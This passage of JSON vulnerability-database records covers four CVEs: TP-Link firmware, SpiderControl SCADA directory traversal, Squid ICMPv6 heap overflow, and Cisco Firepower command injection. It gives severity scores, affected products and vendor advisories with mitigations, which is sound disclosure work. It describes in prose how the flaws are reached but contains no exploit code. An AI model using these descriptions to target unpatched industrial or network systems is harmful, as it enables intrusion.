"userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-23T21:29:00", "title": "CVE-2018-12694", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12694"], "modified": "2018-08-24T14:32:00", "cpe": ["cpe:/o:tp-link:tl-wa850re_firmware:-"], "id": "CVE-2018-12694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12694", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:tp-link:tl-wa850re_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:34", "description": "A Directory Traversal issue was discovered in SpiderControl SCADA Web Server. An attacker may be able to use a simple GET request to perform a directory traversal into system files.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-25T19:29:00", "title": "CVE-2017-12694", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12694"], "modified": "2019-10-09T23:23:00", "cpe": ["cpe:/a:spidercontrol:scada_web_server:-"], "id": "CVE-2017-12694", 
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12694", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:spidercontrol:scada_web_server:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:38", "description": "Heap-based buffer overflow in the Icmp6::Recv function in icmp/Icmp6.cc in the pinger utility in Squid before 3.5.16 and 4.x before 4.0.8 allows remote servers to cause a denial of service (performance degradation or transition failures) or write sensitive information to log files via an ICMPv6 packet.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "baseScore": 8.2, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.2}, "published": "2016-04-07T18:59:00", "title": "CVE-2016-3947", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3947"], "modified": "2016-11-28T20:14:00", "cpe": ["cpe:/a:squid-cache:squid:4.0.6", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:squid-cache:squid:4.0.2", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/a:squid-cache:squid:4.0.4", "cpe:/a:squid-cache:squid:4.0.7", "cpe:/a:squid-cache:squid:3.5.15", "cpe:/a:squid-cache:squid:4.0.3", 
"cpe:/a:squid-cache:squid:4.0.5", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/a:squid-cache:squid:4.0.1"], "id": "CVE-2016-3947", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3947", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:squid-cache:squid:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:3.5.15:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "cisco": [{"lastseen": "2020-12-24T11:40:39", "bulletinFamily": "software", "cvelist": ["CVE-2019-12694"], "description": "A vulnerability in the command line interface (CLI) of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker with administrative privileges to execute commands on the underlying operating system with root privileges.\nThe vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by executing a specific CLI command that includes crafted arguments. A successful exploit could allow the attacker to execute commands on the underlying OS with root privileges.\n\nCisco has released software updates that address this vulnerability. 
There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191002-ftd-cmdinj", "modified": "2019-10-02T15:48:50", "published": "2019-10-02T16:00:00", "id": "CISCO-SA-20191002-FTD-CMDINJ", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191002-ftd-cmdinj", "type": "cisco", "title": "Cisco Firepower Threat Defense Software Command Injection Vulnerability", "cvss": {"score": 6.7, "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}}], "symantec": [{"lastseen": "2019-10-07T14:36:16", "bulletinFamily": "software", "cvelist": ["CVE-2019-12694"], "description": "### Description\n\nCisco Firepower Threat Defense Software is prone to a local command-injection vulnerability. An attacker may exploit this issue to inject and execute arbitrary commands on the underlying OS with root privileges. This issue is being tracked by Cisco Bug ID CSCvo45799.\n\n### Technologies Affected\n\n * Cisco Firepower Threat Defense Software (FTD) 6.1.0 \n * Cisco Firepower Threat Defense Software (FTD) 6.2.0 \n * Cisco Firepower Threat Defense Software (FTD) 6.2.1 \n * Cisco Firepower Threat Defense Software (FTD) 6.2.2 \n * Cisco Firepower Threat Defense Software (FTD) 6.2.3 \n * Cisco Firepower Threat Defense Software (FTD) 6.3.0 \n * Cisco Firepower Threat Defense Software (FTD) 6.4.0 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. 
Where possible, use restricted environments and restricted shells.** \nRestrict local access to trusted and accountable individuals only.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-10-02T00:00:00", "published": "2019-10-02T00:00:00", "id": "SMNTC-110329", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110329", "type": "symantec", "title": "Cisco Firepower Threat Defense Software CVE-2019-12694 Local Command Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2020-06-22T11:41:25", "bulletinFamily": "info", "cvelist": ["CVE-2017-12694"], "edition": 2, "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of SpiderControl SCADA. Authentication is not required to exploit this vulnerability. The specific flaw exists within web server access to the scdefault directory. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. 
An attacker can leverage this vulnerability to disclose files accessible to the SYSTEM account.", "modified": "2017-06-22T00:00:00", "published": "2017-08-23T00:00:00", "id": "ZDI-17-695", "href": "https://www.zerodayinitiative.com/advisories/ZDI-17-695/", "title": "SpiderControl SCADA Webserver iniNet Directory Traversal Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ics": [{"lastseen": "2020-12-18T03:22:36", "bulletinFamily": "info", "cvelist": ["CVE-2017-12694"], "description": "### **CVSS v3 5.3**\n\n**ATTENTION: **Remotely exploitable/low skill level to exploit.\n\n**Vendor:** SpiderControl\n\n**Equipment:** SCADA Web Server\n\n**Vulnerability:** Directory Traversal\n\n## AFFECTED PRODUCTS\n\nThe following versions of SpiderControl SCADA Web Server, a software management platform, are affected:\n\n * SCADA Web Server\n\n## IMPACT\n\nSuccessful exploitation of this vulnerability could cause an attacker to gain read access to system files through directory traversal.\n\n## MITIGATION\n\nSpiderControl has produced a new version of the software (Version 2.02.0100) that can be found at:\n\n<http://spidercontrol.net/downloads-support/user-downloads/>\n\nNCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. 
Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## VULNERABILITY OVERVIEW\n\n## [IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (\u2018PATH TRAVERSAL\u2019) CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nAn attacker may be able to use a simple GET request to perform a directory traversal into system files.\n\n[CVE-2017-12694](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12694>) has been assigned to this vulnerability. 
A CVSS v3 base score of 5.3 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>)).\n\n## RESEARCHER\n\nKarn Ganeshen, working with Trend Micro\u2019s Zero Day Initiative, discovered this vulnerability.\n\n## BACKGROUND\n\n**Critical Infrastructure Sector:** Critical Manufacturing\n\n**Countries/Areas Deployed:** Europe\n\n**Company Headquarters Location:** Switzerland\n", "edition": 15, "modified": "2017-08-22T00:00:00", "published": "2017-08-22T00:00:00", "id": "ICSA-17-234-03", "href": "https://www.us-cert.gov//ics/advisories/ICSA-17-234-03", "title": "SpiderControl SCADA Web Server", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}